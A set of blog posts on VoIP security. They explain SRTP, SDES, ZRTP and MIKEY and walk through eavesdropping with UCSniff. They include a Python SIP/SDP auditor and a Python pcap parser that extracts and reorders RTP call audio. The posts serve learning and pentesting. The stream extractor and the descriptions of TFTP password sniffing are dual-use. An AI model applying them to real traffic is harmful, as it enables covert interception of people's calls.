<span class="Apple-style-span" style="font-family: inherit;">Anyway, I wouldn’t use it if I wanted really secure communication, because I can’t be sure that my conversation is not being relayed through another Skype user’s computer (maybe a bad guy’s).</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- <b>“Standards” SRTP &amp; ZRTP</b>: <b><a href="http://en.wikipedia.org/wiki/Secure_Real-time_Transport_Protocol">SRTP</a></b> (Secure Real-time Transport Protocol) encrypts <a href="http://es.wikipedia.org/wiki/Real-time_Transport_Protoco">RTP</a> traffic to provide confidentiality, message authentication and integrity, and replay protection. It depends on an external key management protocol to set up the initial master key, and there are several protocols for this task: <b><a href="http://en.wikipedia.org/wiki/MIKEY">MIKEY</a></b>, <a href="http://en.wikipedia.org/wiki/ZRTP"><b>ZRTP</b></a> (Media Path Key Agreement for Unicast Secure RTP) and <b><a href="http://en.wikipedia.org/wiki/SDES">SDES</a></b>, which seems to be becoming the de facto standard, mainly because it is an extremely simple technique. Basically, in this method the keys are transported inside a SIP message (as an SDP attachment) and protected with TLS (<a href="http://en.wikipedia.org/wiki/Transport_Layer_Security">Transport Layer Security</a>); you can picture it if you think of the <a href="http://en.wikipedia.org/wiki/HTTP_Secure">HTTPS</a> protocol. It would also be possible to use other methods, such as <a href="http://es.wikipedia.org/wiki/S/MIME">S/MIME</a>, to implement this last function, but they are not very widespread.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8KRbw3oYumJSiwrAndxMEwyfNBNJj0E7rDf-VMdrJQyTLGBzxsgKRjWlQ0wYi2H284YFL-vwyzu3xDUMbIE7W3mHqWIK_D0Kkmwjj3u2HWplqt2vsmZh9uPDltC-GN9yqxh9mEFAPc6Y/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8KRbw3oYumJSiwrAndxMEwyfNBNJj0E7rDf-VMdrJQyTLGBzxsgKRjWlQ0wYi2H284YFL-vwyzu3xDUMbIE7W3mHqWIK_D0Kkmwjj3u2HWplqt2vsmZh9uPDltC-GN9yqxh9mEFAPc6Y/s320/3.png" width="320" /></a></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: TLS example</span></div>
<div style="text-align: center;">
<br /></div>
<span class="Apple-style-span" style="font-family: inherit;">On the other hand, ZRTP was developed as part of the <a href="http://zfoneproject.com/prod_zfone.html">Zfone Project</a>, and its most important advantage is that it is the only one able to provide <a href="http://en.wikipedia.org/wiki/End-to-end_encryption">end-to-end encryption</a>. Even SIP/TLS does not provide it, because the <a href="http://en.wikipedia.org/wiki/IP_PBX">IP PBX</a> is a trusted third party that could eavesdrop on the conversation. Other benefits of this protocol:</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- It uses a <a href="http://en.wikipedia.org/wiki/Public-key_cryptography">public key algorithm</a> while avoiding the complexity of a <a href="http://en.wikipedia.org/wiki/Public_key_infrastructure">PKI</a> (Public Key Infrastructure).</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- It allows the detection of man-in-the-middle (MiTM) attacks, as mentioned before.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- It supports <a href="http://en.wikipedia.org/wiki/Opportunistic_encryption">opportunistic encryption</a>, asking the other VoIP client whether it supports ZRTP before starting a call.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIq3LRYKbeA8S7H_6jJmIJu4UFzznLlrsr4Uf8I6JTEHJQdla7Te1n_IJLNL3SyyP1tMogwQFJ1DGHeKW6Ez-mFW0CpREiULkJ2g41V7BeF8ubEUt0iXfTHayk8OYhcZP6568QGelWcAw/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="229" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIq3LRYKbeA8S7H_6jJmIJu4UFzznLlrsr4Uf8I6JTEHJQdla7Te1n_IJLNL3SyyP1tMogwQFJ1DGHeKW6Ez-mFW0CpREiULkJ2g41V7BeF8ubEUt0iXfTHayk8OYhcZP6568QGelWcAw/s320/4.jpg" width="320" /></a></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Detailed SRTP generic communication</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">NOTE: Eavesdropping on ZRTP seems extremely difficult, but not impossible. To do so, an attacker would have to be present from the very first call, be able to fake the verbal <a href="http://www.audiocodes.com/glossary/sas">SAS</a> in real time and, preferably, imitate voices. (Detailed explanation <a href="http://voipsa.org/blog/2006/06/19/a-tour-through-zfone/">here</a>)</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">They are not exactly standards, but they are the most used option; in fact, SRTP (<a href="http://tools.ietf.org/html/rfc4585">RFC4585</a>)</span> and MIKEY (<a href="http://tools.ietf.org/html/rfc4738">RFC4738</a>) are “Proposed Standard” and ZRTP is “Informational”. ZRTP was developed by <a href="http://en.wikipedia.org/wiki/Phil_Zimmermann">Phil Zimmermann</a> (among others) and recently published by the <a href="http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force">IETF</a> (Internet Engineering Task Force) as <a href="http://tools.ietf.org/html/rfc6189">RFC 6189</a>.<br />
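To make the SDES-over-TLS and ZRTP points above concrete, here is an added example (not code from the post or from any VoIP product) that audits a captured INVITE: it classifies each SDP media line as plain RTP, SDES-keyed SRTP or a ZRTP offer, and flags an SDES key that travelled over an unencrypted SIP hop. The INVITEs, key and hash values are constructed placeholders.

```python
"""Audit a captured SIP INVITE for the protections described above.

Added example, not code from the post or from any VoIP product. For each
m= line of the SDP body it reports whether the media is plain RTP
(RTP/AVP), SRTP keyed by SDES (RTP/SAVP plus an a=crypto line, RFC 4568)
or plain RTP advertising ZRTP (a=zrtp-hash, RFC 6189) for an in-band
upgrade, and whether the top Via header shows the signalling hop ran over
TLS, since an SDES key is only as secret as the SIP transport that
carried it. The INVITEs are constructed; the key and hash are placeholders.
"""


def parse_sip(message):
    """Split a SIP message into (start line, {header: [values]}, body)."""
    head, _, body = message.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def parse_sdp_media(sdp):
    """Return one dict per m= line, noting the key-related attributes under it."""
    media = []
    for line in sdp.splitlines():
        if line.startswith("m="):
            kind, port, proto = line[2:].split()[:3]
            media.append({"kind": kind, "port": int(port), "proto": proto,
                          "crypto": False, "zrtp": False})
        elif media and line.startswith("a=crypto:"):
            media[-1]["crypto"] = True
        elif media and line.startswith("a=zrtp-hash:"):
            media[-1]["zrtp"] = True
    return media


def audit_invite(message):
    """Return (signalling_over_tls, findings) for one INVITE."""
    _, headers, sdp = parse_sip(message)
    via = headers.get("via", [""])[0]
    over_tls = via.upper().startswith("SIP/2.0/TLS")
    findings = []
    for m in parse_sdp_media(sdp):
        if m["port"] == 0:
            continue  # port 0 means the stream is rejected or disabled
        if m["proto"] in ("RTP/SAVP", "RTP/SAVPF"):
            if not m["crypto"]:
                findings.append(f"{m['kind']}: SRTP offered without an SDES key, "
                                "so the master key must come from MIKEY or ZRTP")
            elif not over_tls:
                findings.append(f"{m['kind']}: SDES master key carried over "
                                f"{via.split()[0]}, readable by a sniffer on the path")
        elif m["zrtp"]:
            findings.append(f"{m['kind']}: plain RTP with a ZRTP offer, encrypted "
                            "only if the other end also speaks ZRTP")
        else:
            findings.append(f"{m['kind']}: plain RTP, the stream can be sniffed "
                            "and reassembled")
    return over_tls, findings


def build_invite(transport, media_lines):
    """Constructed INVITE with the given Via transport and SDP media lines."""
    return "\r\n".join([
        "INVITE sip:102@pbx.example SIP/2.0",
        f"Via: SIP/2.0/{transport} 192.0.2.10:5060;branch=z9hG4bK-constructed",
        "From: <sip:101@pbx.example>;tag=a1",
        "To: <sip:102@pbx.example>",
        "Call-ID: constructed-1@192.0.2.10",
        "CSeq: 1 INVITE",
        "Content-Type: application/sdp",
        "",
        "v=0", "o=- 1 1 IN IP4 192.0.2.10", "s=-", "c=IN IP4 192.0.2.10", "t=0 0",
        *media_lines,
    ])


SDES_MEDIA = ["m=audio 7078 RTP/SAVP 0", "a=rtpmap:0 PCMU/8000",
              "a=crypto:1 AES_CM_128_HMAC_SHA1_80 inline:PLACEHOLDER-NOT-A-REAL-KEY"]
PLAIN_UDP = build_invite("UDP", ["m=audio 7078 RTP/AVP 0 8", "a=rtpmap:0 PCMU/8000"])
SDES_UDP = build_invite("UDP", SDES_MEDIA)      # key leaks on the wire
SDES_TLS = build_invite("TLS", SDES_MEDIA)      # the HTTPS-like setup
ZRTP_UDP = build_invite("UDP", ["m=audio 7078 RTP/AVP 0",
                                "a=zrtp-hash:1.10 PLACEHOLDER-HASH"])

if __name__ == "__main__":
    for name, msg in [("plain/UDP", PLAIN_UDP), ("SDES/UDP", SDES_UDP),
                      ("SDES/TLS", SDES_TLS), ("ZRTP/UDP", ZRTP_UDP)]:
        print(name, audit_invite(msg))
```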
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">OK, this is a real mess of protocols, but now, which hardware and software solution should I get? You should choose what level of risk you want to assume and then select software that supports it; I think this comparison list can help you:</span><br />
<a href="http://en.wikipedia.org/wiki/Comparison_of_VoIP_software">http://en.wikipedia.org/wiki/Comparison_of_VoIP_software</a><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaQFZBURmd0K7vcVjq6_1C35hTMta6l1Sd9VIkz1q4S_SfMR_b32FhHLft2oS3jaEpxIyL4nhUFgdqJKwR8QXQesvWsax_E0rUTJS7YNVDQ1SG1ZhDzrr1DYOSmeB4Hfkly-N6FTD26c/s1600/T_Ekiga_in_a_Call.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaQFZBURmd0K7vcVjq6_1C35hTMta6l1Sd9VIkz1q4S_SfMR_b32FhHLft2oS3jaEpxIyL4nhUFgdqJKwR8QXQesvWsax_E0rUTJS7YNVDQ1SG1ZhDzrr1DYOSmeB4Hfkly-N6FTD26c/s320/T_Ekiga_in_a_Call.png" width="281" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Ekiga client </span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">To sum up, I should say I know this was a boring (sorry for that) theoretical post, but I found a lot of confusion on too many sites and forums about this group of protocols and what they can do for us, so I decided to dig in and document it. From now on I will go back to working on proofs of concept, which are much more fun to test, write and read :)</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: right;">
<span class="Apple-style-span" style="font-family: inherit;">Jesús Pérez</span></div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-22356360360984584732011-08-17T22:05:00.003+02:002012-02-11T18:14:51.045+01:00VoIP Eavesdropping: UCSniff (II)<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.google.com/url?q=http%3A%2F%2Fnicerosniunos.blogspot.com%2F2011%2F08%2Fvoip-eavesdropping-ucsniff-i.html"> VoIP Eavesdropping: UCSniff (I)</a></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">To start this second article I'll dig a little deeper into VoIP eavesdropping techniques. </span>There are different classifications on the net, but I'm going to use the one from the <a href="http://www.hackingvoip.com/">"Hacking Exposed VoIP"</a> book (I strongly recommend it) because, in my opinion, it is the most complete. According to it, we define four categories for these attacks:<br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><b>TFTP Configuration File Sniffing</b></span><br />
IP phones often obtain their configuration parameters from a TFTP server; you can get an idea by imagining something similar to the DHCP protocol, but at the application layer, of course. In this case an attacker could obtain some passwords by sniffing the transfer or by downloading the files directly from the TFTP server; moreover, he could even reconfigure the phone. In fact I have a fun idea in mind for another PoC, but we are waiting for someone to lend us a proper phone :).<br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Number Harvesting</b></span><br />
The attacker monitors all calls in order to obtain legitimate numbers and extensions of the system, which will then be used in combination with other attacks.<br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Call Pattern Tracking </b></span><br />
The target of this attack is the list of all calls made by a member of an organization, in order to detect suspicious activity among its members.<br />
<br />
<b>Conversation Eavesdropping and Analysis</b><br />
This is the most impressive attack, because the bad guy tries to record both sides of the conversation.<br />
<br />
That being said, I'm now going to show how <a href="http://ucsniff.sourceforge.net/">UCSniff</a> automates these attacks by studying the results obtained in the <a href="http://www.google.com/url?q=http%3A%2F%2Fnicerosniunos.blogspot.com%2F2011%2F08%2Fvoip-eavesdropping-ucsniff-i.html">last post</a>. The next picture shows the files generated after the sniffing.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju9OM3tlK4qlrsaN0moZFzFxsVHoqobHNBRfyfd_XKgb1sYdtYxZ4Ke_VTrKJ6llkrqQGx6jvtIlzKknDv54dkLI181Js7vLWQRzEpf_vkN8KxYy70_-ZJ7O3eZCbjg1R8qQbrgkJxQj8/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju9OM3tlK4qlrsaN0moZFzFxsVHoqobHNBRfyfd_XKgb1sYdtYxZ4Ke_VTrKJ6llkrqQGx6jvtIlzKknDv54dkLI181Js7vLWQRzEpf_vkN8KxYy70_-ZJ7O3eZCbjg1R8qQbrgkJxQj8/s320/1.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Generated files</span></div>
<div style="text-align: center;">
<br /></div>
<span class="Apple-style-span" style="font-family: inherit;"><b>TFTP Configuration File Sniffing</b> </span><br />
As I said before, I do not have a proper phone for this test, but UCSniff supports it, even the <i>TFTP Modify Attack</i>, as you can see in the picture.<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBLOOvt6G63RZmuVJHBSo-rHs7_FEMFMU0VjOqR4tDVuPG4Vpj4aNFrjmbv1pIbe_ocD6DcOgGTtxG6KPlqbcVa3qnR-znh8u_oPbMKCYSKloCvjVXGQUuJb0vP_mrEYhQlMRUYu1D7I/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBLOOvt6G63RZmuVJHBSo-rHs7_FEMFMU0VjOqR4tDVuPG4Vpj4aNFrjmbv1pIbe_ocD6DcOgGTtxG6KPlqbcVa3qnR-znh8u_oPbMKCYSKloCvjVXGQUuJb0vP_mrEYhQlMRUYu1D7I/s320/2.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: TFTP Modify Attack</span></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Number Harvesting</b></span><br />
During the sniffing we could see the extensions involved in calls on the <i>Output and Status</i> panel. Now we can consult them in <i>call.log</i>, <i>calldetail.log</i> and <i>sip.log</i>; the last one stores a much more detailed log that includes all the SIP messages (<i>REGISTER</i>, <i>INVITE</i>, etc.).<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsjsO8kiwAIIPFiFw_2BjT10phw5cu0TJIdEfOrG5C34M6KXrWYbVeaDrIQ7nHNhA823dwAJYsTCDeNaoDwCWlHBjXm7ZZIQOiz9sGfddO2lMIJiTdXfYmFIndhbPzrQiGzLqkZ1tYck0/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsjsO8kiwAIIPFiFw_2BjT10phw5cu0TJIdEfOrG5C34M6KXrWYbVeaDrIQ7nHNhA823dwAJYsTCDeNaoDwCWlHBjXm7ZZIQOiz9sGfddO2lMIJiTdXfYmFIndhbPzrQiGzLqkZ1tYck0/s320/3.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Detailed call list</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR-rd5Qq0gZGodtj9rGUFhdUjUQYykR7E74ALHhhqPtmB2elZRAQ0vmEW3dLlHQ1ec9oVsIuqTNqlYKgw3NcpVhwIMPq-NOEO_uXuhl7w7P6WRk-N9akTS2A0JTBDUCc_uOyU2RXeGcHc/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR-rd5Qq0gZGodtj9rGUFhdUjUQYykR7E74ALHhhqPtmB2elZRAQ0vmEW3dLlHQ1ec9oVsIuqTNqlYKgw3NcpVhwIMPq-NOEO_uXuhl7w7P6WRk-N9akTS2A0JTBDUCc_uOyU2RXeGcHc/s320/4.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: INVITE from sip.log </span></div>
<div style="text-align: center;">
<br /></div>
<span class="Apple-style-span" style="font-family: inherit;"><b>Call Pattern Tracking</b></span><br />
The files mentioned under Number Harvesting cover this point too.<br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Conversation Eavesdropping and Analysis</b></span><br />
In this example <i>81-Calling-81-18:48:12-3-reverse.wav</i> stores only one side of the conversation, for the reasons discussed in the previous post, but in a real environment we should get something like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuMsk97wUa2Mns_rxkUknMcYT7uxYBBf_1Z6sJgYtjWFxGu3nA8GxrX3V5RVmNKK7zIWtdxSUau38CjorOQEJuXvRpms7KayfdQ2Wg0p_L9WpJSFf61vcP3kaQCL6yEFo02eIRSow_xCk/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuMsk97wUa2Mns_rxkUknMcYT7uxYBBf_1Z6sJgYtjWFxGu3nA8GxrX3V5RVmNKK7zIWtdxSUau38CjorOQEJuXvRpms7KayfdQ2Wg0p_L9WpJSFf61vcP3kaQCL6yEFo02eIRSow_xCk/s320/5.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Generated <i>.wavs</i> in real example</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">The names are really intuitive, so at this point I think you can work out by yourself all the helpful information included in the other generated files; you can ask me any question in a comment or by mail :). In the next post I hope to talk about the countermeasures proposed to protect an infrastructure against this kind of eavesdropping attack.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: right;">
<span class="Apple-style-span" style="font-family: inherit;">Jesús Pérez</span></div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-79702591719622335902011-08-05T16:30:00.065+02:002012-02-11T18:15:14.537+01:00VoIP Eavesdropping: UCSniff (I)<span class="Apple-style-span" style="color: #444444;">After a long time without writing, for various reasons, I am going to begin a series of articles trying to cover different types of attacks against any of the components of a common <a href="http://en.wikipedia.org/wiki/Voice_over_Internet_Protocol">VoIP</a> (Voice over Internet Protocol) infrastructure and how to stop them. If you are just starting out in the VoIP world, I recommend reading <a href="http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=building+telephony+systems+with+opensips+1.6"><i>Building Telephony Systems with OpenSIPS 1.6</i></a>, where the authors go through the basic theoretical and practical skills needed to implement a complete system.</span><br />
<span class="Apple-style-span" style="color: #444444;"><br />
</span><br />
<span class="Apple-style-span" style="color: #444444;">This time, I will start with the VoIP <a href="http://es.wikipedia.org/wiki/Eavesdropping">Eavesdropping</a> attack; as the name suggests, it consists of listening to a conversation without the speakers' consent. This attack existed in traditional telephony systems and nowadays is also possible against VoIP ones (and against other protocols too, for example Bluetooth).</span><br />
<div>
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div>
<div>
<span class="Apple-style-span" style="color: #444444;">As you can imagine, we are facing a classic sniffing attack, so first of all we need to gain access to the traffic. Any of the techniques you know are fine; moreover, there are other ways, specific to this kind of system, of getting the <i>.pcap</i> file we are looking for. For example, some phones have a "feature" that allows saving a <i>.pcap</i> with all the traffic passing through their interfaces, and many of them have vulnerabilities in their web control panel, so it could be possible to access this profitable file :). But that is not the topic of this article, although it is an interesting one too, so I hope to take it up again another day.</span></div>
<div>
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div>
<span class="Apple-style-span" style="color: #444444;">Now that we have the capture, we need a tool able to understand <a href="http://es.wikipedia.org/wiki/Session_Initiation_Protocol">SIP</a> (Session Initiation Protocol) and <a href="http://es.wikipedia.org/wiki/Real-time_Transport_Protocol">RTP</a> (Real-time Transport Protocol), among others. The most used option is <a href="http://www.wireshark.org/">Wireshark</a>, but <a href="http://wiki.wireshark.org/VOIPProtocolFamily">it doesn't support the H.264 video codec</a>, so we can't eavesdrop on video conversations (in that case we should call it IP Video Eavesdropping rather than VoIP Eavesdropping). I found this video where we can see an example:</span></div>
</div>
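<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">What a VoIP sniffer has to do underneath is worth seeing once in plain code. The following Python script is an added example written for this page, not code from UCSniff, Wireshark or Xplico: it walks a pcap, reads the media IP and port that the SIP INVITE announces in its SDP body (the <i>c=</i> and <i>m=audio</i> lines), then collects the RTP packets sent to that endpoint, groups them by SSRC, orders them by sequence number and reports the sequence numbers that are missing. The capture it parses is constructed inline by <i>make_capture()</i>; the addresses, ports, Call-ID and SSRC in it are invented, and the parser only handles classic little-endian pcap with Ethernet/IPv4/UDP frames.</span></div>

```python
"""SIP/SDP + RTP demuxer over a pcap: the mechanism a VoIP sniffer automates.
Added example, not UCSniff's code. The capture built by make_capture() and
every address, port and SSRC in it are constructed for this example."""
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4   # classic little-endian pcap, microsecond timestamps
ETH_IPV4 = 0x0800
IPPROTO_UDP = 17


def udp_frame(src, dst, sport, dport, payload):
    """Ethernet/IPv4/UDP frame with zeroed checksums (enough for offline parsing)."""
    eth = b"\x00" * 12 + struct.pack("!H", ETH_IPV4)
    udp_len = 8 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + udp_len, 0, 0, 64, IPPROTO_UDP,
                     0, bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return eth + ip + struct.pack("!HHHH", sport, dport, udp_len, 0) + payload


def rtp_packet(seq, ts, ssrc, payload, pt=0):
    """RTP v2 header (no CSRC, no extension) + payload; payload type 0 = PCMU."""
    return struct.pack("!BBHII", 0x80, pt, seq, ts, ssrc) + payload


def make_capture():
    """Constructed pcap: a SIP INVITE carrying SDP, then RTP with one lost packet."""
    sdp = ("v=0\r\no=alice 1 1 IN IP4 10.0.0.5\r\ns=-\r\nc=IN IP4 10.0.0.5\r\n"
           "t=0 0\r\nm=audio 4000 RTP/AVP 0 8\r\na=rtpmap:0 PCMU/8000\r\n")
    invite = ("INVITE sip:bob@10.0.0.9 SIP/2.0\r\nVia: SIP/2.0/UDP 10.0.0.5:5060\r\n"
              "From: <sip:alice@10.0.0.5>\r\nTo: <sip:bob@10.0.0.9>\r\n"
              "Call-ID: abc123@10.0.0.5\r\nCSeq: 1 INVITE\r\n"
              "Content-Type: application/sdp\r\n"
              f"Content-Length: {len(sdp)}\r\n\r\n{sdp}").encode()
    frames = [udp_frame("10.0.0.5", "10.0.0.9", 5060, 5060, invite)]
    for i, seq in enumerate([10, 11, 13, 14]):      # seq 12 deliberately missing
        frames.append(udp_frame("10.0.0.9", "10.0.0.5", 4002, 4000,
                                rtp_packet(seq, 160 * i, 0xCAFEBABE, bytes([seq]) * 4)))
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)]
    for n, frame in enumerate(frames):
        out.append(struct.pack("<IIII", n, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def udp_datagrams(pcap):
    """Yield (src_ip, dst_ip, sport, dport, payload) for every UDP/IPv4 packet."""
    if struct.unpack("<I", pcap[:4])[0] != PCAP_MAGIC:
        raise ValueError("only classic little-endian pcap is handled here")
    off = 24
    while off + 16 <= len(pcap):
        incl = struct.unpack("<IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if struct.unpack("!H", frame[12:14])[0] != ETH_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != IPPROTO_UDP:
            continue
        sport, dport, ulen, _ = struct.unpack("!HHHH", ip[ihl:ihl + 8])
        yield (".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20])),
               sport, dport, ip[ihl + 8:ihl + ulen])


def sdp_media_endpoint(sip_text):
    """(ip, port) from the SDP c= and m=audio lines of a SIP message, else None."""
    ip = port = None
    for line in sip_text.splitlines():
        if line.startswith("c=IN IP4 "):
            ip = line.split()[2]
        elif line.startswith("m=audio "):
            port = int(line.split()[1])
    return (ip, port) if ip and port else None


def extract_streams(pcap):
    """Learn media endpoints from SDP, then collect the RTP sent to them.
    Returns {ssrc: (payload_in_sequence_order, missing_sequence_numbers)}.
    Limitations: no 16-bit sequence wrap, no RTP padding/extension handling,
    and SIP over TCP/TLS or ports changed by a re-INVITE are not followed."""
    endpoints, streams = set(), defaultdict(dict)
    for src, dst, sport, dport, data in udp_datagrams(pcap):
        if data.startswith((b"INVITE", b"SIP/2.0")):     # request or response with SDP
            ep = sdp_media_endpoint(data.decode("ascii", "replace"))
            if ep:
                endpoints.add(ep)
        elif (dst, dport) in endpoints and len(data) >= 12 and data[0] >> 6 == 2:
            flags, _, seq, _, ssrc = struct.unpack("!BBHII", data[:12])
            streams[ssrc][seq] = data[12 + 4 * (flags & 0x0F):]   # skip CSRC list
    result = {}
    for ssrc, pkts in streams.items():
        seqs = sorted(pkts)
        missing = [s for s in range(seqs[0], seqs[-1] + 1) if s not in pkts]
        result[ssrc] = (b"".join(pkts[s] for s in seqs), missing)
    return result


if __name__ == "__main__":
    for ssrc, (audio, lost) in extract_streams(make_capture()).items():
        print(f"SSRC {ssrc:08x}: {len(audio)} payload bytes, lost seq {lost}")
```

Run as-is it reports one stream of 16 payload bytes with sequence number 12 lost. Feed it the bytes of a real <i>.pcap</i> (from a phone's capture feature or from UCSniff) instead of <i>make_capture()</i> and what comes back is raw codec data, PCMU in this example, which is what still has to be decoded and muxed to get the <i>.wav</i> that UCSniff writes.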
<div>
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/K6rvhjt_HvM/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/K6rvhjt_HvM&fs=1&source=uds" />
<param name="bgcolor" value="#FFFFFF" />
<embed width="320" height="266" src="http://www.youtube.com/v/K6rvhjt_HvM&fs=1&source=uds" type="application/x-shockwave-flash"></embed></object></span></div>
<div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;"><a href="http://www.youtube.com/watch?v=K6rvhjt_HvM&feature=player_embedded">Video: Conversation Eavesdropping with Wireshark</a></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">I like Wireshark for studying specific situations but, for pentesting, we need something more automatic, able to reconstruct and synchronise conversations correctly. I usually use <a href="http://www.xplico.org/">Xplico</a> for this kind of thing but, for the moment, the SIP, SDP and RTP protocols are not fully supported, as its website shows:</span></div>
</div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
